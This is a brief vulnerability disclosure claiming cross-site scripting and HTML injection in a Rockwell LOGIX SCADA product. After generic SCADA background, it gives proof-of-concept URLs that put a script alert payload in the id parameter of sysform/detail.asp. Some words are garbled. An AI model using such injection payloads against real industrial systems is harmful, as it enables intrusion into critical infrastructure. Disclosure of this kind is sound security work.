Rockwell LOGIX 5324 ER Cross Site Scripting

Rockwell LOGIX 5324 ER suffers from cross site scripting and html injection vulnerabilities.


MD5 | ea5b7abf9d32d9e47f4676930d6def4b

 Vulnerable Product(s):  Rockwell  SCADA/ICS System
Affected Version(s): Rockwell LOGIX 5324 ER
Vulnerability Typus: Cross Site Scripting & HTML Adegnjection

Description:
SCADA systems are crucial for industrial organizations since they help to
maintain efficiency, process data for smarter decisions, and communicate
system issues to help mitigate downtime.

The basic SCADA architecture begins with programmable logic controllers
(PLCs) or remote terminal units (RTUs). PLCs and RTUs are microcomputers
that communicate with an array of objects such as factory machines, HMIs,
sensors, and end devices, and then route the information from those objects
to computers with SCADA software. The SCADA software processes,
distributes, and displays the data, helping operators and other employees
analyze the data and make important decisions.

Technical Details:

1. Start the application
2. Go to ipadress.com/ sysform/detail.asp?id=<script>alert(1);</script>
3. oopss. XSS detected
4. Go to sysform/detail.asp?id=html code
5. oppss html injection detected

PoC or Exploitcode:
ipadress/sysform/detail.asp?id=<script>alert(1);</script>
ipadress/sysform/detail.asp?id=html code

Author/Group: Adegsmail BALBAL & Sezai Ali HOROZOALU

Vendor-URL: https://www.rockwellautomation.com/
Product-URL: https://www.rockwellautomation.com/

Related Posts